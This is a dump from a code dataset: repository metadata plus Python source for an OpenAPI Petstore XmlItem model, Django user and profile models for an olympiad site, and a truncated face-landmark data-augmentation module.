hexsha
stringlengths 40
40
| size
int64 6
1.04M
| ext
stringclasses 10
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 4
247
| max_stars_repo_name
stringlengths 4
130
| max_stars_repo_head_hexsha
stringlengths 40
78
| max_stars_repo_licenses
listlengths 1
10
| max_stars_count
int64 1
368k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 4
247
| max_issues_repo_name
stringlengths 4
130
| max_issues_repo_head_hexsha
stringlengths 40
78
| max_issues_repo_licenses
listlengths 1
10
| max_issues_count
int64 1
116k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 4
247
| max_forks_repo_name
stringlengths 4
130
| max_forks_repo_head_hexsha
stringlengths 40
78
| max_forks_repo_licenses
listlengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 1
1.04M
| avg_line_length
float64 1.53
618k
| max_line_length
int64 1
1.02M
| alphanum_fraction
float64 0
1
| original_content
stringlengths 6
1.04M
| filtered:remove_non_ascii
int64 0
538k
| filtered:remove_decorators
int64 0
917k
| filtered:remove_async
int64 0
722k
| filtered:remove_classes
int64 -45
1M
| filtered:remove_generators
int64 0
814k
| filtered:remove_function_no_docstring
int64 -102
850k
| filtered:remove_class_no_docstring
int64 -3
5.46k
| filtered:remove_unused_imports
int64 -1,350
52.4k
| filtered:remove_delete_markers
int64 0
59.6k
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
f7ded778c29259e2a89bf5a9a9ac772ebb515972
| 25,965
|
py
|
Python
|
samples/client/petstore/python-experimental/petstore_api/models/xml_item.py
|
malymato/openapi-generator
|
47e2c0d027d867de67633bbc9c0a5d7e1054a778
|
[
"Apache-2.0"
] | 2
|
2019-12-08T12:00:11.000Z
|
2022-01-02T13:47:52.000Z
|
samples/client/petstore/python-experimental/petstore_api/models/xml_item.py
|
malymato/openapi-generator
|
47e2c0d027d867de67633bbc9c0a5d7e1054a778
|
[
"Apache-2.0"
] | 8
|
2021-03-01T21:18:19.000Z
|
2022-02-27T07:56:15.000Z
|
samples/client/petstore/python-experimental/petstore_api/models/xml_item.py
|
malymato/openapi-generator
|
47e2c0d027d867de67633bbc9c0a5d7e1054a778
|
[
"Apache-2.0"
] | 1
|
2020-03-08T12:31:09.000Z
|
2020-03-08T12:31:09.000Z
|
# coding: utf-8
"""
OpenAPI Petstore
This spec is mainly for testing Petstore server and contains fake endpoints, models. Please do not use this for any other purpose. Special characters: \" \\ # noqa: E501
The version of the OpenAPI document: 1.0.0
Generated by: https://openapi-generator.tech
"""
| 35.135318
| 174
| 0.605507
|
# coding: utf-8
"""
OpenAPI Petstore
This spec is mainly for testing Petstore server and contains fake endpoints, models. Please do not use this for any other purpose. Special characters: \" \\ # noqa: E501
The version of the OpenAPI document: 1.0.0
Generated by: https://openapi-generator.tech
"""
import pprint # noqa: F401
import re # noqa: F401
import six # noqa: F401
from petstore_api.exceptions import ( # noqa: F401
ApiKeyError,
ApiTypeError,
ApiValueError,
)
from petstore_api.model_utils import ( # noqa: F401
ModelNormal,
ModelSimple,
check_allowed_values,
check_validations,
date,
datetime,
file_type,
get_simple_class,
int,
model_to_dict,
none_type,
str,
type_error_message,
validate_and_convert_types
)
class XmlItem(ModelNormal):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
Attributes:
allowed_values (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
with a capitalized key describing the allowed value and an allowed
value. These dicts store the allowed enum values.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
discriminator_value_class_map (dict): A dict to go from the discriminator
variable value to the discriminator class name.
openapi_types (dict): The key is attribute name
and the value is attribute type.
validations (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
that stores validations for max_length, min_length, max_items,
min_items, exclusive_maximum, inclusive_maximum, exclusive_minimum,
inclusive_minimum, and regex.
additional_properties_type (tuple): A tuple of classes accepted
as additional properties values.
"""
allowed_values = {
}
attribute_map = {
'attribute_string': 'attribute_string', # noqa: E501
'attribute_number': 'attribute_number', # noqa: E501
'attribute_integer': 'attribute_integer', # noqa: E501
'attribute_boolean': 'attribute_boolean', # noqa: E501
'wrapped_array': 'wrapped_array', # noqa: E501
'name_string': 'name_string', # noqa: E501
'name_number': 'name_number', # noqa: E501
'name_integer': 'name_integer', # noqa: E501
'name_boolean': 'name_boolean', # noqa: E501
'name_array': 'name_array', # noqa: E501
'name_wrapped_array': 'name_wrapped_array', # noqa: E501
'prefix_string': 'prefix_string', # noqa: E501
'prefix_number': 'prefix_number', # noqa: E501
'prefix_integer': 'prefix_integer', # noqa: E501
'prefix_boolean': 'prefix_boolean', # noqa: E501
'prefix_array': 'prefix_array', # noqa: E501
'prefix_wrapped_array': 'prefix_wrapped_array', # noqa: E501
'namespace_string': 'namespace_string', # noqa: E501
'namespace_number': 'namespace_number', # noqa: E501
'namespace_integer': 'namespace_integer', # noqa: E501
'namespace_boolean': 'namespace_boolean', # noqa: E501
'namespace_array': 'namespace_array', # noqa: E501
'namespace_wrapped_array': 'namespace_wrapped_array', # noqa: E501
'prefix_ns_string': 'prefix_ns_string', # noqa: E501
'prefix_ns_number': 'prefix_ns_number', # noqa: E501
'prefix_ns_integer': 'prefix_ns_integer', # noqa: E501
'prefix_ns_boolean': 'prefix_ns_boolean', # noqa: E501
'prefix_ns_array': 'prefix_ns_array', # noqa: E501
'prefix_ns_wrapped_array': 'prefix_ns_wrapped_array' # noqa: E501
}
openapi_types = {
'attribute_string': (str,), # noqa: E501
'attribute_number': (float,), # noqa: E501
'attribute_integer': (int,), # noqa: E501
'attribute_boolean': (bool,), # noqa: E501
'wrapped_array': ([int],), # noqa: E501
'name_string': (str,), # noqa: E501
'name_number': (float,), # noqa: E501
'name_integer': (int,), # noqa: E501
'name_boolean': (bool,), # noqa: E501
'name_array': ([int],), # noqa: E501
'name_wrapped_array': ([int],), # noqa: E501
'prefix_string': (str,), # noqa: E501
'prefix_number': (float,), # noqa: E501
'prefix_integer': (int,), # noqa: E501
'prefix_boolean': (bool,), # noqa: E501
'prefix_array': ([int],), # noqa: E501
'prefix_wrapped_array': ([int],), # noqa: E501
'namespace_string': (str,), # noqa: E501
'namespace_number': (float,), # noqa: E501
'namespace_integer': (int,), # noqa: E501
'namespace_boolean': (bool,), # noqa: E501
'namespace_array': ([int],), # noqa: E501
'namespace_wrapped_array': ([int],), # noqa: E501
'prefix_ns_string': (str,), # noqa: E501
'prefix_ns_number': (float,), # noqa: E501
'prefix_ns_integer': (int,), # noqa: E501
'prefix_ns_boolean': (bool,), # noqa: E501
'prefix_ns_array': ([int],), # noqa: E501
'prefix_ns_wrapped_array': ([int],), # noqa: E501
}
validations = {
}
additional_properties_type = None
discriminator = None
def __init__(self, _check_type=True, _from_server=False, _path_to_item=(), _configuration=None, **kwargs): # noqa: E501
"""XmlItem - a model defined in OpenAPI
Keyword Args:
_check_type (bool): if True, values for parameters in openapi_types
will be type checked and a TypeError will be
raised if the wrong type is input.
Defaults to True
_path_to_item (tuple/list): This is a list of keys or values to
drill down to the model in received_data
when deserializing a response
_from_server (bool): True if the data is from the server
False if the data is from the client (default)
_configuration (Configuration): the instance to use when
deserializing a file_type parameter.
If passed, type conversion is attempted
If omitted no type conversion is done.
attribute_string (str): [optional] # noqa: E501
attribute_number (float): [optional] # noqa: E501
attribute_integer (int): [optional] # noqa: E501
attribute_boolean (bool): [optional] # noqa: E501
wrapped_array ([int]): [optional] # noqa: E501
name_string (str): [optional] # noqa: E501
name_number (float): [optional] # noqa: E501
name_integer (int): [optional] # noqa: E501
name_boolean (bool): [optional] # noqa: E501
name_array ([int]): [optional] # noqa: E501
name_wrapped_array ([int]): [optional] # noqa: E501
prefix_string (str): [optional] # noqa: E501
prefix_number (float): [optional] # noqa: E501
prefix_integer (int): [optional] # noqa: E501
prefix_boolean (bool): [optional] # noqa: E501
prefix_array ([int]): [optional] # noqa: E501
prefix_wrapped_array ([int]): [optional] # noqa: E501
namespace_string (str): [optional] # noqa: E501
namespace_number (float): [optional] # noqa: E501
namespace_integer (int): [optional] # noqa: E501
namespace_boolean (bool): [optional] # noqa: E501
namespace_array ([int]): [optional] # noqa: E501
namespace_wrapped_array ([int]): [optional] # noqa: E501
prefix_ns_string (str): [optional] # noqa: E501
prefix_ns_number (float): [optional] # noqa: E501
prefix_ns_integer (int): [optional] # noqa: E501
prefix_ns_boolean (bool): [optional] # noqa: E501
prefix_ns_array ([int]): [optional] # noqa: E501
prefix_ns_wrapped_array ([int]): [optional] # noqa: E501
"""
self._data_store = {}
self._check_type = _check_type
self._from_server = _from_server
self._path_to_item = _path_to_item
self._configuration = _configuration
for var_name, var_value in six.iteritems(kwargs):
self.__set_item(var_name, var_value)
def __set_item(self, name, value):
path_to_item = []
if self._path_to_item:
path_to_item.extend(self._path_to_item)
path_to_item.append(name)
if name in self.openapi_types:
required_types_mixed = self.openapi_types[name]
elif self.additional_properties_type is None:
raise ApiKeyError(
"{0} has no key '{1}'".format(type(self).__name__, name),
path_to_item
)
elif self.additional_properties_type is not None:
required_types_mixed = self.additional_properties_type
if get_simple_class(name) != str:
error_msg = type_error_message(
var_name=name,
var_value=name,
valid_classes=(str,),
key_type=True
)
raise ApiTypeError(
error_msg,
path_to_item=path_to_item,
valid_classes=(str,),
key_type=True
)
if self._check_type:
value = validate_and_convert_types(
value, required_types_mixed, path_to_item, self._from_server,
self._check_type, configuration=self._configuration)
if (name,) in self.allowed_values:
check_allowed_values(
self.allowed_values,
(name,),
value
)
if (name,) in self.validations:
check_validations(
self.validations,
(name,),
value
)
self._data_store[name] = value
def __get_item(self, name):
if name in self._data_store:
return self._data_store[name]
path_to_item = []
if self._path_to_item:
path_to_item.extend(self._path_to_item)
path_to_item.append(name)
raise ApiKeyError(
"{0} has no key '{1}'".format(type(self).__name__, name),
[name]
)
def __setitem__(self, name, value):
"""this allows us to set values with instance[field_name] = val"""
self.__set_item(name, value)
def __getitem__(self, name):
"""this allows us to get a value with val = instance[field_name]"""
return self.__get_item(name)
@property
def attribute_string(self):
"""Gets the attribute_string of this XmlItem. # noqa: E501
Returns:
(str): The attribute_string of this XmlItem. # noqa: E501
"""
return self.__get_item('attribute_string')
@attribute_string.setter
def attribute_string(self, value):
"""Sets the attribute_string of this XmlItem. # noqa: E501
"""
return self.__set_item('attribute_string', value)
@property
def attribute_number(self):
"""Gets the attribute_number of this XmlItem. # noqa: E501
Returns:
(float): The attribute_number of this XmlItem. # noqa: E501
"""
return self.__get_item('attribute_number')
@attribute_number.setter
def attribute_number(self, value):
"""Sets the attribute_number of this XmlItem. # noqa: E501
"""
return self.__set_item('attribute_number', value)
@property
def attribute_integer(self):
"""Gets the attribute_integer of this XmlItem. # noqa: E501
Returns:
(int): The attribute_integer of this XmlItem. # noqa: E501
"""
return self.__get_item('attribute_integer')
@attribute_integer.setter
def attribute_integer(self, value):
"""Sets the attribute_integer of this XmlItem. # noqa: E501
"""
return self.__set_item('attribute_integer', value)
@property
def attribute_boolean(self):
"""Gets the attribute_boolean of this XmlItem. # noqa: E501
Returns:
(bool): The attribute_boolean of this XmlItem. # noqa: E501
"""
return self.__get_item('attribute_boolean')
@attribute_boolean.setter
def attribute_boolean(self, value):
"""Sets the attribute_boolean of this XmlItem. # noqa: E501
"""
return self.__set_item('attribute_boolean', value)
@property
def wrapped_array(self):
"""Gets the wrapped_array of this XmlItem. # noqa: E501
Returns:
([int]): The wrapped_array of this XmlItem. # noqa: E501
"""
return self.__get_item('wrapped_array')
@wrapped_array.setter
def wrapped_array(self, value):
"""Sets the wrapped_array of this XmlItem. # noqa: E501
"""
return self.__set_item('wrapped_array', value)
@property
def name_string(self):
"""Gets the name_string of this XmlItem. # noqa: E501
Returns:
(str): The name_string of this XmlItem. # noqa: E501
"""
return self.__get_item('name_string')
@name_string.setter
def name_string(self, value):
"""Sets the name_string of this XmlItem. # noqa: E501
"""
return self.__set_item('name_string', value)
@property
def name_number(self):
"""Gets the name_number of this XmlItem. # noqa: E501
Returns:
(float): The name_number of this XmlItem. # noqa: E501
"""
return self.__get_item('name_number')
@name_number.setter
def name_number(self, value):
"""Sets the name_number of this XmlItem. # noqa: E501
"""
return self.__set_item('name_number', value)
@property
def name_integer(self):
"""Gets the name_integer of this XmlItem. # noqa: E501
Returns:
(int): The name_integer of this XmlItem. # noqa: E501
"""
return self.__get_item('name_integer')
@name_integer.setter
def name_integer(self, value):
"""Sets the name_integer of this XmlItem. # noqa: E501
"""
return self.__set_item('name_integer', value)
@property
def name_boolean(self):
"""Gets the name_boolean of this XmlItem. # noqa: E501
Returns:
(bool): The name_boolean of this XmlItem. # noqa: E501
"""
return self.__get_item('name_boolean')
@name_boolean.setter
def name_boolean(self, value):
"""Sets the name_boolean of this XmlItem. # noqa: E501
"""
return self.__set_item('name_boolean', value)
@property
def name_array(self):
"""Gets the name_array of this XmlItem. # noqa: E501
Returns:
([int]): The name_array of this XmlItem. # noqa: E501
"""
return self.__get_item('name_array')
@name_array.setter
def name_array(self, value):
"""Sets the name_array of this XmlItem. # noqa: E501
"""
return self.__set_item('name_array', value)
@property
def name_wrapped_array(self):
"""Gets the name_wrapped_array of this XmlItem. # noqa: E501
Returns:
([int]): The name_wrapped_array of this XmlItem. # noqa: E501
"""
return self.__get_item('name_wrapped_array')
@name_wrapped_array.setter
def name_wrapped_array(self, value):
"""Sets the name_wrapped_array of this XmlItem. # noqa: E501
"""
return self.__set_item('name_wrapped_array', value)
@property
def prefix_string(self):
"""Gets the prefix_string of this XmlItem. # noqa: E501
Returns:
(str): The prefix_string of this XmlItem. # noqa: E501
"""
return self.__get_item('prefix_string')
@prefix_string.setter
def prefix_string(self, value):
"""Sets the prefix_string of this XmlItem. # noqa: E501
"""
return self.__set_item('prefix_string', value)
@property
def prefix_number(self):
"""Gets the prefix_number of this XmlItem. # noqa: E501
Returns:
(float): The prefix_number of this XmlItem. # noqa: E501
"""
return self.__get_item('prefix_number')
@prefix_number.setter
def prefix_number(self, value):
"""Sets the prefix_number of this XmlItem. # noqa: E501
"""
return self.__set_item('prefix_number', value)
@property
def prefix_integer(self):
"""Gets the prefix_integer of this XmlItem. # noqa: E501
Returns:
(int): The prefix_integer of this XmlItem. # noqa: E501
"""
return self.__get_item('prefix_integer')
@prefix_integer.setter
def prefix_integer(self, value):
"""Sets the prefix_integer of this XmlItem. # noqa: E501
"""
return self.__set_item('prefix_integer', value)
@property
def prefix_boolean(self):
"""Gets the prefix_boolean of this XmlItem. # noqa: E501
Returns:
(bool): The prefix_boolean of this XmlItem. # noqa: E501
"""
return self.__get_item('prefix_boolean')
@prefix_boolean.setter
def prefix_boolean(self, value):
"""Sets the prefix_boolean of this XmlItem. # noqa: E501
"""
return self.__set_item('prefix_boolean', value)
@property
def prefix_array(self):
"""Gets the prefix_array of this XmlItem. # noqa: E501
Returns:
([int]): The prefix_array of this XmlItem. # noqa: E501
"""
return self.__get_item('prefix_array')
@prefix_array.setter
def prefix_array(self, value):
"""Sets the prefix_array of this XmlItem. # noqa: E501
"""
return self.__set_item('prefix_array', value)
@property
def prefix_wrapped_array(self):
"""Gets the prefix_wrapped_array of this XmlItem. # noqa: E501
Returns:
([int]): The prefix_wrapped_array of this XmlItem. # noqa: E501
"""
return self.__get_item('prefix_wrapped_array')
@prefix_wrapped_array.setter
def prefix_wrapped_array(self, value):
"""Sets the prefix_wrapped_array of this XmlItem. # noqa: E501
"""
return self.__set_item('prefix_wrapped_array', value)
@property
def namespace_string(self):
"""Gets the namespace_string of this XmlItem. # noqa: E501
Returns:
(str): The namespace_string of this XmlItem. # noqa: E501
"""
return self.__get_item('namespace_string')
@namespace_string.setter
def namespace_string(self, value):
"""Sets the namespace_string of this XmlItem. # noqa: E501
"""
return self.__set_item('namespace_string', value)
@property
def namespace_number(self):
"""Gets the namespace_number of this XmlItem. # noqa: E501
Returns:
(float): The namespace_number of this XmlItem. # noqa: E501
"""
return self.__get_item('namespace_number')
@namespace_number.setter
def namespace_number(self, value):
"""Sets the namespace_number of this XmlItem. # noqa: E501
"""
return self.__set_item('namespace_number', value)
@property
def namespace_integer(self):
"""Gets the namespace_integer of this XmlItem. # noqa: E501
Returns:
(int): The namespace_integer of this XmlItem. # noqa: E501
"""
return self.__get_item('namespace_integer')
@namespace_integer.setter
def namespace_integer(self, value):
"""Sets the namespace_integer of this XmlItem. # noqa: E501
"""
return self.__set_item('namespace_integer', value)
@property
def namespace_boolean(self):
"""Gets the namespace_boolean of this XmlItem. # noqa: E501
Returns:
(bool): The namespace_boolean of this XmlItem. # noqa: E501
"""
return self.__get_item('namespace_boolean')
@namespace_boolean.setter
def namespace_boolean(self, value):
"""Sets the namespace_boolean of this XmlItem. # noqa: E501
"""
return self.__set_item('namespace_boolean', value)
@property
def namespace_array(self):
"""Gets the namespace_array of this XmlItem. # noqa: E501
Returns:
([int]): The namespace_array of this XmlItem. # noqa: E501
"""
return self.__get_item('namespace_array')
@namespace_array.setter
def namespace_array(self, value):
"""Sets the namespace_array of this XmlItem. # noqa: E501
"""
return self.__set_item('namespace_array', value)
@property
def namespace_wrapped_array(self):
"""Gets the namespace_wrapped_array of this XmlItem. # noqa: E501
Returns:
([int]): The namespace_wrapped_array of this XmlItem. # noqa: E501
"""
return self.__get_item('namespace_wrapped_array')
@namespace_wrapped_array.setter
def namespace_wrapped_array(self, value):
"""Sets the namespace_wrapped_array of this XmlItem. # noqa: E501
"""
return self.__set_item('namespace_wrapped_array', value)
@property
def prefix_ns_string(self):
"""Gets the prefix_ns_string of this XmlItem. # noqa: E501
Returns:
(str): The prefix_ns_string of this XmlItem. # noqa: E501
"""
return self.__get_item('prefix_ns_string')
@prefix_ns_string.setter
def prefix_ns_string(self, value):
"""Sets the prefix_ns_string of this XmlItem. # noqa: E501
"""
return self.__set_item('prefix_ns_string', value)
@property
def prefix_ns_number(self):
"""Gets the prefix_ns_number of this XmlItem. # noqa: E501
Returns:
(float): The prefix_ns_number of this XmlItem. # noqa: E501
"""
return self.__get_item('prefix_ns_number')
@prefix_ns_number.setter
def prefix_ns_number(self, value):
"""Sets the prefix_ns_number of this XmlItem. # noqa: E501
"""
return self.__set_item('prefix_ns_number', value)
@property
def prefix_ns_integer(self):
"""Gets the prefix_ns_integer of this XmlItem. # noqa: E501
Returns:
(int): The prefix_ns_integer of this XmlItem. # noqa: E501
"""
return self.__get_item('prefix_ns_integer')
@prefix_ns_integer.setter
def prefix_ns_integer(self, value):
"""Sets the prefix_ns_integer of this XmlItem. # noqa: E501
"""
return self.__set_item('prefix_ns_integer', value)
@property
def prefix_ns_boolean(self):
"""Gets the prefix_ns_boolean of this XmlItem. # noqa: E501
Returns:
(bool): The prefix_ns_boolean of this XmlItem. # noqa: E501
"""
return self.__get_item('prefix_ns_boolean')
@prefix_ns_boolean.setter
def prefix_ns_boolean(self, value):
"""Sets the prefix_ns_boolean of this XmlItem. # noqa: E501
"""
return self.__set_item('prefix_ns_boolean', value)
@property
def prefix_ns_array(self):
"""Gets the prefix_ns_array of this XmlItem. # noqa: E501
Returns:
([int]): The prefix_ns_array of this XmlItem. # noqa: E501
"""
return self.__get_item('prefix_ns_array')
@prefix_ns_array.setter
def prefix_ns_array(self, value):
"""Sets the prefix_ns_array of this XmlItem. # noqa: E501
"""
return self.__set_item('prefix_ns_array', value)
@property
def prefix_ns_wrapped_array(self):
"""Gets the prefix_ns_wrapped_array of this XmlItem. # noqa: E501
Returns:
([int]): The prefix_ns_wrapped_array of this XmlItem. # noqa: E501
"""
return self.__get_item('prefix_ns_wrapped_array')
@prefix_ns_wrapped_array.setter
def prefix_ns_wrapped_array(self, value):
"""Sets the prefix_ns_wrapped_array of this XmlItem. # noqa: E501
"""
return self.__set_item('prefix_ns_wrapped_array', value)
def to_dict(self):
"""Returns the model properties as a dict"""
return model_to_dict(self, serialize=False)
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, XmlItem):
return False
if not set(self._data_store.keys()) == set(other._data_store.keys()):
return False
for _var_name, this_val in six.iteritems(self._data_store):
that_val = other._data_store[_var_name]
types = set()
types.add(this_val.__class__)
types.add(that_val.__class__)
vals_equal = this_val == that_val
if (not six.PY3 and
len(types) == 2 and unicode in types): # noqa: F821
vals_equal = (
this_val.encode('utf-8') == that_val.encode('utf-8')
)
if not vals_equal:
return False
return True
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| 0
| 12,077
| 0
| 13,050
| 0
| 0
| 0
| 339
| 178
|
9cc0213534d4746545b92434c9c6e16f37a99b1a
| 4,745
|
py
|
Python
|
Grundgeruest/models.py
|
wmles/olymp
|
97b1a256982c2a75c39ba3a855b63a147d4409c5
|
[
"MIT"
] | null | null | null |
Grundgeruest/models.py
|
wmles/olymp
|
97b1a256982c2a75c39ba3a855b63a147d4409c5
|
[
"MIT"
] | null | null | null |
Grundgeruest/models.py
|
wmles/olymp
|
97b1a256982c2a75c39ba3a855b63a147d4409c5
|
[
"MIT"
] | null | null | null |
"""
Die Modelle fr Projektweite Daten: Nutzer/Profile
"""
from django.urls import reverse
def knoepfe_kopf(user):
""" gibt Knpfe fr Kopfleiste als Liste von Tupeln zurck """
anmelden = (reverse('userena_signin'), 'Anmelden')
registrieren = (reverse('userena_signup'), 'Registrieren')
abmelden = (reverse('userena_signout'), 'Abmelden')
profil = lambda nutzer: (reverse('userena_profile_detail',
kwargs={'username': nutzer.username}), 'Profil')
spam = ('spam', 'spam')
admin = ('/admin/', 'admin')
if user.username == 'admin':
liste = [abmelden, profil(user), spam]
elif user.is_authenticated():
liste = [abmelden, profil(user)]
else:
liste = [anmelden, registrieren]
if user.is_staff and user.get_all_permissions():
liste.append(admin)
return liste
def knoepfe_men(user):
""" gibt Knpfe fr Menleiste als Liste von Tupeln zurck """
alle = {
'index': ('/', 'Startseite'),
'olymp': (reverse('Wettbewerbe:index'), 'Wettbewerbe'),
'ehemalige': (reverse('Ehemalige:index'), 'Ehemalige'),
'impressum': (reverse('impressum'), 'Impressum'),
'db': ('https://olymp.piokg.de/static/db.pdf', 'Datenbanklayout'), # quick and very dirty :)
'todo': ('/todo/', 'ToDo-Liste'),
}
if user.username == 'admin':
return [alle[name] for name in ('index', 'olymp', 'ehemalige', 'todo', 'db')]
else:
return [alle[name] for name in ('index', 'olymp', 'db', 'impressum')]
| 32.278912
| 100
| 0.616228
|
"""
Die Modelle für Projektweite Daten: Nutzer/Profile
"""
from django.db import models
from django.contrib.auth.models import AbstractUser
from django.conf import settings
from django.utils.translation import ugettext as _
from userena.models import UserenaBaseProfile
from django.core.validators import RegexValidator
import random, string
from django.template.defaultfilters import slugify
from django.urls import reverse
class MinimalModel(models.Model):
zeit_erstellt = models.DateTimeField(
auto_now_add=True,
editable=False)
zeit_geaendert = models.DateTimeField(
auto_now=True,
editable=False)
class Meta:
abstract = True
ordering = ["-zeit_geaendert"]
def __str__(self):
return self.__class__().__name__() + ' geändert ' + str(zeit_geaendert)
class Grundklasse(MinimalModel):
bezeichnung = models.CharField(max_length=30)
slug = models.SlugField(
max_length=30,
null=False,
blank=True)
def save(self, **kwargs):
if not self.slug:
self.slug = slugify(self.bezeichnung)
super(Grundklasse, self).save()
class Meta:
abstract = True
ordering = ["bezeichnung"]
def __str__(self):
return str(self.bezeichnung)
def knoepfe_kopf(user):
""" gibt Knöpfe für Kopfleiste als Liste von Tupeln zurück """
anmelden = (reverse('userena_signin'), 'Anmelden')
registrieren = (reverse('userena_signup'), 'Registrieren')
abmelden = (reverse('userena_signout'), 'Abmelden')
profil = lambda nutzer: (reverse('userena_profile_detail',
kwargs={'username': nutzer.username}), 'Profil')
spam = ('spam', 'spam')
admin = ('/admin/', 'admin')
if user.username == 'admin':
liste = [abmelden, profil(user), spam]
elif user.is_authenticated():
liste = [abmelden, profil(user)]
else:
liste = [anmelden, registrieren]
if user.is_staff and user.get_all_permissions():
liste.append(admin)
return liste
def knoepfe_menü(user):
""" gibt Knöpfe für Menüleiste als Liste von Tupeln zurück """
alle = {
'index': ('/', 'Startseite'),
'olymp': (reverse('Wettbewerbe:index'), 'Wettbewerbe'),
'ehemalige': (reverse('Ehemalige:index'), 'Ehemalige'),
'impressum': (reverse('impressum'), 'Impressum'),
'db': ('https://olymp.piokg.de/static/db.pdf', 'Datenbanklayout'), # quick and very dirty :)
'todo': ('/todo/', 'ToDo-Liste'),
}
if user.username == 'admin':
return [alle[name] for name in ('index', 'olymp', 'ehemalige', 'todo', 'db')]
else:
return [alle[name] for name in ('index', 'olymp', 'db', 'impressum')]
class Nutzer(AbstractUser):
""" Nutzer-Klasse """
def knoepfe_kopf(nutzer):
""" soll Liste von Paaren für Knöpfe der Kopfleiste ausgeben
Nutzt im Moment die module-fkt gleichen Namens, könnte später vll
die Gruppenzugehörigkeit heranziehen, etc, ist flexibel """
return knoepfe_kopf(nutzer)
def knoepfe_menü(self):
""" soll Liste von Paaren für Knöpfe der Menüleiste ausgeben
Nutzt im Moment die module-fkt gleichen Namens, könnte später vll
die Gruppenzugehörigkeit heranziehen, etc, ist flexibel """
return knoepfe_menü(self)
def save(self, *args, **kwargs):
if not self.username:
self.username = ''.join(random.sample(string.ascii_lowercase, 20))
super(Nutzer, self).save(*args, **kwargs)
class Meta:
verbose_name_plural = 'Nutzer'
verbose_name = 'Nutzer'
def __str__(self):
return 'Nutzer %s (%s)' % (self.username, self.email)
class Nutzerprofil(UserenaBaseProfile):
user = models.OneToOneField(settings.AUTH_USER_MODEL,
unique=True,
verbose_name=_('Nutzer'),
related_name='my_profile')
geschlecht = models.CharField(
max_length=1,
choices=[('w', 'weiblich'), ('m', 'männlich'), (' ', 'sonstiges')],
default=' ')
tel = models.CharField(
max_length=20,
null=True, blank=True)
strasse = models.CharField(
max_length=30,
blank=True)
plz = models.CharField(
max_length = 5,
validators=[RegexValidator('^[0-9]+$')],
blank=True)
ort = models.CharField(
max_length=30,
blank=True)
anredename = models.CharField(
max_length=30,
null=True, blank=True)
class Meta():
verbose_name = 'Nutzerprofil'
verbose_name_plural = 'Nutzerprofile'
| 48
| 0
| 0
| 2,713
| 0
| 0
| 0
| 158
| 269
|
b3e937dcb8ac9e14cc91bc39a1395544f1f257fb
| 8,595
|
py
|
Python
|
dataset/datasets.py
|
notplus/FaceLandmark_PFLD_UltraLight
|
89aa36d5369f7d8d6661eb67d8490c774ea4685a
|
[
"Apache-2.0"
] | 38
|
2021-05-10T01:22:44.000Z
|
2022-03-30T06:54:39.000Z
|
dataset/datasets.py
|
notplus/FaceLandmark_PFLD_UltraLight
|
89aa36d5369f7d8d6661eb67d8490c774ea4685a
|
[
"Apache-2.0"
] | 7
|
2021-06-01T06:39:47.000Z
|
2022-03-16T05:43:50.000Z
|
dataset/datasets.py
|
notplus/FaceLandmark_PFLD_UltraLight
|
89aa36d5369f7d8d6661eb67d8490c774ea4685a
|
[
"Apache-2.0"
] | 14
|
2021-05-10T01:22:46.000Z
|
2022-03-30T06:54:42.000Z
|
import sys
sys.path.append('..')
from torch.utils.data import DataLoader
if __name__ == '__main__':
file_list = './data/test_data/list.txt'
wlfwdataset = WLFWDatasets(file_list)
dataloader = DataLoader(wlfwdataset, batch_size=256, shuffle=True, num_workers=0, drop_last=False)
for img, landmark, attribute, euler_angle in dataloader:
print("img shape", img.shape)
print("landmark size", landmark.size())
print("attrbute size", attribute)
print("euler_angle", euler_angle.size())
| 33.705882
| 166
| 0.601745
|
import numpy as np
import cv2
import sys
import torch
sys.path.append('..')
from torch.utils import data
from torch.utils.data import DataLoader
def flip(img, annotation):
# parse
img = np.fliplr(img).copy()
h, w = img.shape[:2]
x_min, y_min, x_max, y_max = annotation[0:4]
landmark_x = annotation[4::2]
landmark_y = annotation[4 + 1::2]
bbox = np.array([w - x_max, y_min, w - x_min, y_max])
for i in range(len(landmark_x)):
landmark_x[i] = w - landmark_x[i]
new_annotation = list()
new_annotation.append(x_min)
new_annotation.append(y_min)
new_annotation.append(x_max)
new_annotation.append(y_max)
for i in range(len(landmark_x)):
new_annotation.append(landmark_x[i])
new_annotation.append(landmark_y[i])
return img, new_annotation
def channel_shuffle(img, annotation):
if (img.shape[2] == 3):
ch_arr = [0, 1, 2]
np.random.shuffle(ch_arr)
img = img[..., ch_arr]
return img, annotation
def random_noise(img, annotation, limit=[0, 0.2], p=0.5):
if random.random() < p:
H, W = img.shape[:2]
noise = np.random.uniform(limit[0], limit[1], size=(H, W)) * 255
img = img + noise[:, :, np.newaxis] * np.array([1, 1, 1])
img = np.clip(img, 0, 255).astype(np.uint8)
return img, annotation
def random_brightness(img, annotation, brightness=0.3):
alpha = 1 + np.random.uniform(-brightness, brightness)
img = alpha * image
img = np.clip(img, 0, 255).astype(np.uint8)
return img, annotation
def random_contrast(img, annotation, contrast=0.3):
coef = np.array([[[0.114, 0.587, 0.299]]]) # rgb to gray (YCbCr)
alpha = 1.0 + np.random.uniform(-contrast, contrast)
gray = img * coef
gray = (3.0 * (1.0 - alpha) / gray.size) * np.sum(gray)
img = alpha * img + gray
img = np.clip(img, 0, 255).astype(np.uint8)
return img, annotation
def random_saturation(img, annotation, saturation=0.5):
